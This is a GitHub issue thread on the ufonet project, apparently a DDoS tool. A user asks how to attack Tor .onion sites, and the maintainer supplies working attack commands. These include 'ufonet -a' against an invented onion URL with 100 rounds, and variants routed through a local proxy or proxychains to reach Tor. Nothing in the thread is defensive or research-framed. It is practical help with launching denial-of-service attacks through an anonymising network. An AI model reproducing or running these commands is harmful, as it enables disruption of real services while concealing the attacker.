### ISSUE TITLE
Can i run ufonet for deep sites

### ISSUE THREAD

**Issue by Arcai666333999** [epsylon/ufonet#188]
Hello... Question for programmers of ufonet or ufonet users, can i run Ddos with ufonet on the deep web sites??? For example hd98cdtf67fdtdd.onion.
I invented this link for make example.

**Comment by epsylon** [comment]
@Arcai666333999 yes, it is possible.

**Comment by Arcai666333999** [comment]
Ok.....but how??? how do I configure to run attacks on deep web sites ??

**Comment by epsylon** [comment]
just run it normally, as if it were a "clearnet" url.
ex: ufonet -a "https://hd98cdtf67fdtdd.onion/" -r 100
+more examples: ufonet --examples
+FAQ: https://ufonet.03c8.net/FAQ.html

**Comment by Arcai666333999** [comment]
Mmmhhhh....strange....
If i run this, ufonet terminal says that not able to find server, i need to enable tor connection for run ufonet on deep web??

**Comment by epsylon** [comment]
Sure!. If it's not a kind of contradiction, don't you think? 
You have to use a transparent proxy, which will make you reach the TOR network (for example):
ufonet -a "https://hd98cdtf67fdtdd.onion/" -r 100 --proxy="http://127.0.0.1:8118"
or using other tools:
proxychains python2 ufonet -a "https://hd98cdtf67fdtdd.onion/" -r 100

**Comment by Arcai666333999** [comment]
Ok man....thank you.
